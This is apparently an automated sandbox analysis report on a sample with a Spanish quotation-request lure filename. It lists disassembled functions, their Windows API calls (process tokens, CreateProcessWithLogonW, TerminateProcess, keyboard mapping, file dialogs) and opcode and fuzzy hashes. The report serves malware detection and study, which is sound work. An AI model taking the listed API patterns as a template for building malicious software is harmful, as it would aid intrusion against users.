Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: e67054c15fabebbbcacbcfdd10a59af534d8df6c7270826cdc949b6cd8ab9458
Instruction ID: ed94fb1a76cc77b72f308c236dccd85f1e93fd006a45e9f86a2ac984e192904f
Opcode Fuzzy Hash: e67054c15fabebbbcacbcfdd10a59af534d8df6c7270826cdc949b6cd8ab9458
Instruction Fuzzy Hash: 8851D931630310ABCF90AF65D995B29B3A8EF45312B245467ED05DF292DB708CA4CB5A

Function 0027910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00207620: _wcslen.LIBCMT ref: 00207625

Part of subcall function 00206B57: _wcslen.LIBCMT ref: 00206B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 002794E5
_wcslen.LIBCMT ref: 00279506
_wcslen.LIBCMT ref: 0027952D
GetSaveFileNameW.COMDLG32(00000058), ref: 00279585

Strings

X, xrefs: 00279412

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: f421a14c7e058e28e26ae3cc9fabcb99223d359d4840b5c2df363b964f484cd1
Instruction ID: 20d93f676d4f2e047267c755e844e50046a74681f22c6732ad5326cc74ec3386
Opcode Fuzzy Hash: f421a14c7e058e28e26ae3cc9fabcb99223d359d4840b5c2df363b964f484cd1
Instruction Fuzzy Hash: AAE1D3315283518FC724EF24C881A6AB7E4FF85314F04896DF8899B2A2DB30DD95CF92

Function 0021920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00219BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00219BB2

BeginPaint.USER32(?,?,?), ref: 00219241
GetWindowRect.USER32(?,?), ref: 002192A5
ScreenToClient.USER32(?,?), ref: 002192C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 002192D3
EndPaint.USER32(?,?,?,?,?), ref: 00219321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 002571EA

Part of subcall function 00219339: BeginPath.GDI32(00000000), ref: 00219357

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 356c92a20ea1115673d82f258e244b3dc1578801094514999741baa6b14402e1
Instruction ID: fba255d965e0fa0df06b6127249dbfd0fab281992bedf365ca47a9361980fc6d
Opcode Fuzzy Hash: 356c92a20ea1115673d82f258e244b3dc1578801094514999741baa6b14402e1
Instruction Fuzzy Hash: 5A41EF30115201AFD710DF24ECA8FEA7BE8EF55320F14026AF968872A1C7309CA5DB61

Function 002707EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0027080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00270847
EnterCriticalSection.KERNEL32(?), ref: 00270863
LeaveCriticalSection.KERNEL32(?), ref: 002708DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 002708F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00270921

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: bc1c151584fe1af2674db907438d8a042b62bf92f9f9c77c71db954df70c5707
Instruction ID: 35b5bb286c6d2e61699d1f84a7fa9dd078a2d9bdc2c75322af44b474e6d0c346
Opcode Fuzzy Hash: bc1c151584fe1af2674db907438d8a042b62bf92f9f9c77c71db954df70c5707
Instruction Fuzzy Hash: 4A416871A10205EFDF14AF54EC85AAA77B8FF04300F1480A5ED049A29BDB70DE64DBA4

Function 002981DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0025F3AB,00000000,?,?,00000000,?,0025682C,00000004,00000000,00000000), ref: 0029824C
EnableWindow.USER32(00000000,00000000), ref: 00298272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 002982D1
ShowWindow.USER32(00000000,00000004), ref: 002982E5
EnableWindow.USER32(00000000,00000001), ref: 0029830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0029832F

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: aed7596a581cf31bf7a25bf45ccae85217d0664642cb00a2be2f4e13f11380f2
Instruction ID: a9381927f95995e968fe7768548a34e3e5e80c4727d89b5def12acc6f8ac0cd3
Opcode Fuzzy Hash: aed7596a581cf31bf7a25bf45ccae85217d0664642cb00a2be2f4e13f11380f2
Instruction Fuzzy Hash: D3418434A01685AFDF15CF15D899BF47BE1BB4B714F1C41AAE9084B262CB31AC61CB54

Function 00264C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00264C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00264CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00264CEA
_wcslen.LIBCMT ref: 00264D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00264D10
_wcsstr.LIBVCRUNTIME ref: 00264D1A

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 9ae4e6a91c1c5d034ff144b7455df54699244f7d76aece60704b42d1da6942c2
Instruction ID: a8b957a6571d1c812396dd9b8dd82bbd6257fe968e9a7ee4254ddd61c79ddd44
Opcode Fuzzy Hash: 9ae4e6a91c1c5d034ff144b7455df54699244f7d76aece60704b42d1da6942c2
Instruction Fuzzy Hash: FF213B32614201BBEB196F35EC49E7F7BDCDF45750F10403AF805CA191DA61DCA0D6A0

Function 0027581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00203AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00203A97,?,?,00202E7F,?,?,?,00000000), ref: 00203AC2

_wcslen.LIBCMT ref: 0027587B
CoInitialize.OLE32(00000000), ref: 00275995
CoCreateInstance.OLE32(0029FCF8,00000000,00000001,0029FB68,?), ref: 002759AE
CoUninitialize.OLE32 ref: 002759CC

Strings

.lnk, xrefs: 00275876, 002758C1, 00275985

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 15402c81334bb7730c188d0d51ac5d2e2fa771c2a66fd04673cf6a94a4927196
Instruction ID: c734a2951abe96e8d21f514a1af01f8830fbc28ecc2e7942c34062274bf3467d
Opcode Fuzzy Hash: 15402c81334bb7730c188d0d51ac5d2e2fa771c2a66fd04673cf6a94a4927196
Instruction Fuzzy Hash: C6D15270624712DFC714DF24C484A2ABBE1EF89314F14885DF88A9B3A2DB71EC55CB92

Function 0026175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00260FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00260FCA
Part of subcall function 00260FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00260FD6
Part of subcall function 00260FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00260FE5
Part of subcall function 00260FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00260FEC
Part of subcall function 00260FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00261002

GetLengthSid.ADVAPI32(?,00000000,00261335), ref: 002617AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 002617BA
HeapAlloc.KERNEL32(00000000), ref: 002617C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 002617DA
GetProcessHeap.KERNEL32(00000000,00000000,00261335), ref: 002617EE
HeapFree.KERNEL32(00000000), ref: 002617F5

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: c751e22dcca042c2293f5829e7d13df12ea0924f979a7c82b1b53c279a80338b
Instruction ID: f1ccfcac824d004210253ca1da8368ebab47bf2919e377f5f55880751fb810e7
Opcode Fuzzy Hash: c751e22dcca042c2293f5829e7d13df12ea0924f979a7c82b1b53c279a80338b
Instruction Fuzzy Hash: AE11E231520206FFDB119FA4DC49FAFBBB9EF45355F284029F4459B210D735AAA0CBA0

Function 002614CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 002614FF
OpenProcessToken.ADVAPI32(00000000), ref: 00261506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00261515
CloseHandle.KERNEL32(00000004), ref: 00261520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0026154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 00261563

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 45eeb34148aa68d5d28ce6d56abdc7d2142f7054fd6d865bb6235b8cef5387a3
Instruction ID: 3cac5aba750a9e5552a5eb050730850109012b1d33ddec74c52fb3a777f4f6a5
Opcode Fuzzy Hash: 45eeb34148aa68d5d28ce6d56abdc7d2142f7054fd6d865bb6235b8cef5387a3
Instruction Fuzzy Hash: D7113A7250120EABDF119FA8EE49FDE7BA9EF48744F184055FA05A2060C375DEA0DB61

Function 00223382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00223379,00222FE5), ref: 00223390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0022339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002233B7
SetLastError.KERNEL32(00000000,?,00223379,00222FE5), ref: 00223409

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 72d92ea0c8630b86039e87ad0fa8562db4b3b3462be4f28b31286957a2e8ee00
Instruction ID: 498fdeee2f69e65951c14025709a4902c53ce91a67844879ac8c813bc3281ede
Opcode Fuzzy Hash: 72d92ea0c8630b86039e87ad0fa8562db4b3b3462be4f28b31286957a2e8ee00
Instruction Fuzzy Hash: B0012832238332BEA614BBF47C899762A98EB057757300269F410801F0EF154E329988

Function 00232D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00235686,00243CD6,?,00000000,?,00235B6A,?,?,?,?,?,0022E6D1,?,002C8A48), ref: 00232D78
_free.LIBCMT ref: 00232DAB
_free.LIBCMT ref: 00232DD3
SetLastError.KERNEL32(00000000,?,?,?,?,0022E6D1,?,002C8A48,00000010,00204F4A,?,?,00000000,00243CD6), ref: 00232DE0
SetLastError.KERNEL32(00000000,?,?,?,?,0022E6D1,?,002C8A48,00000010,00204F4A,?,?,00000000,00243CD6), ref: 00232DEC
_abort.LIBCMT ref: 00232DF2

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 3a6d02ff99130694923e4821891f5cbdce935c669e82a24ee8550e6c422396e0
Instruction ID: 94900ab5e88fdf8e39134279a70cf0c5495d033146d747cafa3f0cefc4ebfb1d
Opcode Fuzzy Hash: 3a6d02ff99130694923e4821891f5cbdce935c669e82a24ee8550e6c422396e0
Instruction Fuzzy Hash: EDF028B1535605EBC2123B34BC0AF1B2559AFC27A0F34045AF828922E2EE708C3A5520

Function 00298A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00219639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00219693
Part of subcall function 00219639: SelectObject.GDI32(?,00000000), ref: 002196A2
Part of subcall function 00219639: BeginPath.GDI32(?), ref: 002196B9
Part of subcall function 00219639: SelectObject.GDI32(?,00000000), ref: 002196E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00298A4E
LineTo.GDI32(?,00000003,00000000), ref: 00298A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00298A70
LineTo.GDI32(?,00000000,00000003), ref: 00298A80
EndPath.GDI32(?), ref: 00298A90
StrokePath.GDI32(?), ref: 00298AA0

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 72391f6df5d3b5fccb4f58a4dba5373120b80d27dcd79b56b71725a6cac81b52
Instruction ID: 41ddbd880f125183e80b51225999d3f5780b77d705cbdbeb74c58d6d606edd34
Opcode Fuzzy Hash: 72391f6df5d3b5fccb4f58a4dba5373120b80d27dcd79b56b71725a6cac81b52
Instruction Fuzzy Hash: D2110976000149FFDF129F90EC88EEA7F6DEB08350F148012FA199A1A1C7719D65DFA0

Function 002651FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00265218
GetDeviceCaps.GDI32(00000000,00000058), ref: 00265229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00265230
ReleaseDC.USER32(00000000,00000000), ref: 00265238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0026524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00265261

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 0c91e4b001f4d0ca1aef9396cfadf1cd8fa641c6866cc8dd7df0aa8e82b19fce
Instruction ID: 31f6457b7628f26114b768d1ec513bc377b40d0695b5bfb2b7b5391bc35de128
Opcode Fuzzy Hash: 0c91e4b001f4d0ca1aef9396cfadf1cd8fa641c6866cc8dd7df0aa8e82b19fce
Instruction Fuzzy Hash: 0F016275E00719BBEF109FA59C49E5EBFB8EF48751F144066FA04A7281D6709C10CFA0

Function 00201BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00201BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 00201BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00201C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00201C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 00201C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00201C22

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: ff3bb8eb46e1535816a4f8892caa6c225968d967fb262f99664bb7a0acf73991
Instruction ID: d87174f940dbecd3e824e4ca31f4fdb61fbf10d3aafa3fd6d22cacd732618e96
Opcode Fuzzy Hash: ff3bb8eb46e1535816a4f8892caa6c225968d967fb262f99664bb7a0acf73991
Instruction Fuzzy Hash: AD0167B0902B5ABDE3008F6A8C85B52FFA8FF59354F00411BA15C4BA42C7F5A864CBE5

Function 0026EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0026EB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0026EB46
GetWindowThreadProcessId.USER32(?,?), ref: 0026EB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0026EB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0026EB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0026EB75

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 639160ba26d4ba407768260fee7d870f1e7348312614c2556323d4bd00cf58f1
Instruction ID: 545945ae881785dbff2de54a40bd4ddc3649753f41090e57ffaec2fae8b87608
Opcode Fuzzy Hash: 639160ba26d4ba407768260fee7d870f1e7348312614c2556323d4bd00cf58f1
Instruction Fuzzy Hash: 16F05E72240158BBE7215B62EC0EEEF3E7CEFCAB11F10015AF601D1091D7A05A01C6B9

Function 00257439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00257452
SendMessageW.USER32(?,00001328,00000000,?), ref: 00257469
GetWindowDC.USER32(?), ref: 00257475
GetPixel.GDI32(00000000,?,?), ref: 00257484
ReleaseDC.USER32(?,00000000), ref: 00257496
GetSysColor.USER32(00000005), ref: 002574B0

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 037d1e545685816caa5016b9f3d8df11ed66624ce235fad75037e39bf1ce91c5
Instruction ID: c8234c0f2c582b08af70960f1adeca04b8e3e428e8b415aa472d191229edf109
Opcode Fuzzy Hash: 037d1e545685816caa5016b9f3d8df11ed66624ce235fad75037e39bf1ce91c5
Instruction Fuzzy Hash: F2014B31410215EFDB515FA4EC0CBAA7BB5FB04312FA14165FD1AA21A1CB311E61AB50

Function 00261874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0026187F
UnloadUserProfile.USERENV(?,?), ref: 0026188B
CloseHandle.KERNEL32(?), ref: 00261894
CloseHandle.KERNEL32(?), ref: 0026189C
GetProcessHeap.KERNEL32(00000000,?), ref: 002618A5
HeapFree.KERNEL32(00000000), ref: 002618AC

Memory Dump Source

